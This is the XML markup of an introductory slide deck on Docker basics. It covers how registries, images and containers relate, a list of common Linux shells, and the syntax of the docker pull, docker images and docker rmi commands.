            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Registry - - - &gt; Image - - - - - &gt; Cont1,Cont2,...</a:t>
            </a:r>
            <a:endParaRPr sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1393" name="Google Shape;1393;p223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539625" y="335725"/>
            <a:ext cx="7800600" cy="8316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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Basic Docker concepts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5100">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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143997" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Google Shape;107;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7425475" y="235850"/>
            <a:ext cx="1534925" cy="437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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="359650"/>
            <a:ext cx="8520600" cy="70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3559">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of Linux Shells</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;22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38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bourne Again Shell (bash) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Ubuntu (Mostly Used)   /bin/bash</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bourne Shell (sh) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alpine </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                            /bin/sh</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C Shell (csh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TENEX C Shell (tcsh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KornShell (ksh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian Almquist Shell (dash)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Z Shell (zsh)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF00FF"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friendly Interactive Shell (fish)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250750" y="250700"/>
            <a:ext cx="8520600" cy="5727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275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3550">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download the image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1399" name="Google Shape;1399;p224"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="823400"/>
            <a:ext cx="8520600" cy="3919500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Long Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image pull &lt;image</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ame&gt;:&lt;tagname&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Short </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker pull &lt;imagename&gt;:&lt;tagname&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2450">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker pull node:latest</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="248"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3550">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3550">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Display the downloaded images</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1405" name="Google Shape;1405;p225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421400" y="1250000"/>
            <a:ext cx="6188100" cy="3010500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker images (short)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="3550">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image ls (Long)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3550">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546475" y="1156775"/>
            <a:ext cx="8520600" cy="24147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275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imageName:Tagname/Version</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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2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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3795">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How r</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3795">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>emove docker image?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="Google Shape;1416;p227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8520600" cy="3919500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Long Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker image  rmi &lt;ImageId&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&lt;imageName:tagName&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Short Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker rmi  &lt;ImageId&gt;/&lt;imageName:tagName&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
